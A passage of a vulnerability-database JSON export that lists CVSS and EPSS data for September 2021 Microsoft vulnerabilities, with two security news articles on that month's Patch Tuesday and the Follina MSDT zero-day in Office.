["QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "RAPID7BLOG:8D4E5743B0CE5246D493CE7356B4972D", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "saint", "idList": ["SAINT:B21EB0CE85BB4A8171AF59A4CF014F01"]}, {"type": "securelist", "idList": ["SECURELIST:63306FA6D056BD9A04969409AC790D84"]}, {"type": "thn", "idList": ["THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "THN:D4E86BD8938D3B2E15104CA4922A51F8"]}, {"type": "threatpost", "idList": ["THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "zdt", "idList": ["1337DAY-ID-36967"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-36955", "epss": "0.026040000", "percentile": "0.886310000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36963", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36965", "epss": "0.013190000", "percentile": "0.838930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36975", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38633", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38639", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38647", "epss": "0.974860000", "percentile": "0.999410000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38667", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38671", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-40444", "epss": "0.966120000", "percentile": "0.993300000", "modified": "2023-03-17"}, {"cve": "CVE-2021-40447", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1678920471, "score": 1684009192, "epss": 1679112172}, "_internal": {"score_hash": "c2291edbcb0553857961c25f1bbcd8a4"}}

{"prion": [{"lastseen": "2023-08-16T07:11:24", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-38671.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-40447", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:41:00", "id": "PRION:CVE-2021-40447", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-40447", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:39", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38671, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38667", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:53:00", "id": "PRION:CVE-2021-38667", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38667", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:38", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38671", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:52:00", "id": "PRION:CVE-2021-38671", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38671", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:34:25", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-38633.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36963", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-24T18:15:00", "id": "PRION:CVE-2021-36963", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36963", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:34:19", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36963, CVE-2021-38633.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36955", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-36955", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36955", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:32", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-36963.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38633", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-38633"], "modified": "2021-09-26T21:23:00", "id": "PRION:CVE-2021-38633", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38633", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:34:31", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38639.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36975", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-26T21:08:00", "id": "PRION:CVE-2021-36975", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36975", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:32", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36975.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38639", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-26T21:31:00", "id": "PRION:CVE-2021-38639", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38639", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:34:26", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36965", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-25T11:27:00", "id": "PRION:CVE-2021-36965", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:34", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38647", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-38647", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:11:26", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-40444", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-14T11:49:00", "id": "PRION:CVE-2021-40444", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-n2LTDkSYrUk/YUF8P0ggXPI/AAAAAAAADzE/Jk_5Hbl3Sf4AUwjPizqDaRZLrxWgrDizgCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nA day after [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) and [Google](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) rolled out urgent security updates, Microsoft has [pushed software fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Sep>) as part of its monthly Patch Tuesday release cycle to plug 66 security holes affecting Windows and other components such as Azure, Office, BitLocker, and Visual Studio, including an [actively exploited zero-day](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) in its MSHTML Platform that came to light last week. \n\nOf the 66 flaws, three are rated Critical, 62 are rated Important, and one is rated Moderate in severity. This is aside from the [20 vulnerabilities](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Microsoft Edge browser that the company addressed since the start of the month.\n\nThe most important of the updates concerns a patch for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8), an actively exploited remote code execution vulnerability in MSHTML that leverages malware-laced Microsoft Office documents, with EXPMON researchers noting \"the exploit uses logical flaws so the exploitation is perfectly reliable.\"\n\nAlso addressed is a publicly disclosed, but not actively exploited, zero-day flaw in Windows DNS. Designated as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>), the elevation of privilege vulnerability is rated 7.8 in severity.\n\nOther flaws of note resolved by Microsoft involve a number of remote code execution bugs in Open Management Infrastructure ([CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>)), Windows WLAN AutoConfig Service ([CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>)), Office ([CVE-2021-38659](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38659>)), Visual Studio ([CVE-2021-36952](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36952>)), and Word ([CVE-2021-38656](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38656>)) as well as a memory corruption flaw in Windows Scripting Engine ([CVE-2021-26435](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26435>))\n\nWhat's more, the Windows maker has rectified three privilege escalation flaws newly uncovered in its Print Spooler service ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38671>), and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40447>)), while [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36975>) and [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38639>) (CVSS scores: 7.8), both of which relate to an elevation of privilege vulnerabilities in Win32k, are listed as 'exploitation more likely,' making it imperative that users move quickly to apply the security updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-09-01>)\n * [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-September/thread.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T05:00:00", "type": "thn", "title": "Microsoft Releases Patch for Actively Exploited Windows Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36952", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38656", "CVE-2021-38659", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2021-09-15T05:00:22", "id": "THN:67ECC712AB360F5A56F2434CDBF6B51F", "href": "https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", 